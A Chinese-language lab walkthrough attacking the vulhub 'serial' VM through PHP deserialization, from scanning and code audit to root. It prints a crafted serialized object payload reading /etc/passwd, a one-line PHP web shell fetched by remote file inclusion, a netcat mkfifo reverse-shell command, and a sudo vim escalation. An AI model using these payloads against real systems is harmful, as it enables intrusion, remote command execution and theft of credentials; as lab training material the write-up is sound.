原创Jarry 四叶草网络安全学院

今天研究一下php反序列化，靶机serial实战。目标为获取root权限。

靶机信息

可以去vulhub上下载此靶机，下载好，之后，使用Vmware新建虚拟机打开，步骤如下：

• 1.首先创建新的虚拟机。

• 2.然后选择客户机版本为Ubuntu 64位。

• 3.然后选择使用现有磁盘，选择下载的vmdk磁盘文件即可。

• 4.打开虚拟机，环境配置完成。

渗透测试过程

探测主机存活（目标主机IP地址）

• 使用nmap探测主机存活或者使用Kali里的netdicover进行探测。-PS/-PA/-PU/-PY:这些参数即可以探测主机存活，也可以同时进行端口扫描。（例如：-PS，发送TCP SYN包进行主机探测）

扫描到存活主机：192.168.242.129，开放了22和80端口

访问web服务

• 1.首先访问80端口，页面只有一行文本：Hello sk4This is a beta test for new cookie handler，提示这里是新cookie进行程序测试，那我们查看cookie。

• 2.F12查看，是一串base64编码。

• 3.使用burpsuite解码，是一串代码，下面有解释。

思路一：

• 尝试逻辑绕过，将sk4换成admin，看看是否有什么信息。

• 这里直接报500错误，没办法，只有找其他思路。

思路二：

目录扫描

• 1.使用dirbuster工具进行扫描，这里扫到一个/backup/目录。

• 2.打开查看，是一个zip文件，下载查看，是三个源代码文件。

代码审计

• 1.通过代码审计得知，首先index.php文件包含了user.class.php文件，对cookie中的user参数进行了序列化和base64编码，然后user.class.php文件包含了log.class.php，且定义了两个类，分别是Welcome和User，并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log，且handler函数对变量还进行了文件包含和输出。

• 2.经过代码审计可构造payload，尝试读取passwd文件，payload如下：O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}，然后在命令行窗口，打开python，添加base64模块，再经序列化和base64编码后，进行执行，但是一直不能成功执行。

• 3.通过对比发现base64存在一定的不同，需要进行修改，将空格使用x00替换，然后再进行编码读取/etc/passwd文件。

这里我们仍然使用python进行操作，首先使用replace()函数将payload中所有的空格替换成x00：'O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}'.replace(' ','x00')，然后再使用base64模块进行编码:base64.b64encode(b'O:4:"User":2:{s:10:"x00Userx00name";s:5:"admin";s:9:"x00Userx00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')，编码后的payload如下：Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHdlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIjt9fQ==

• 4.然后在burpsuite的repeater模块中，将payload赋值给cookie中的user，然后点击 [go]，读取到passwd文件，可以看到可登录系统用户除了root，还有sk4。

获取shell

• 1.因为这样执行命令不太方便，我们可以换一种方式，在本地打开web服务，上传一个txt文件，内容是：<?php system($_GET['cmd']);?>。

• 2.然后构造payload：O:4:"User":2:{s:10:"x00Userx00name";s:5:"admin";s:9:"x00Userx00wel";O:3:"Log":1:{s:8:"type_log";s:26:"http://本地IP/c.txt";}}，然后进行序列化和base64编码执行。

命令执行成功。

• 3.添加反弹shell:rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.0.102+4444+>/tmp/f，没有回应，但反弹shell成功。

提升权限

• 1.查看系统版本，内核版本。

• 2.查看根目录发现存在敏感文件credentials.txt.bak。

• 3.打开查看是用户名和密码，SSH登录。

• 4.刚才查看了版本，暂时找不到可提权的漏洞，那么，我们尝试找一下当前用户可执行与无法执行的指令，可以看到vim编辑器对所有用户NOPASSWD。

• 5.尝试提权，试试sudo vim，进入到命令模式输入!bash。

• 6.提权成功。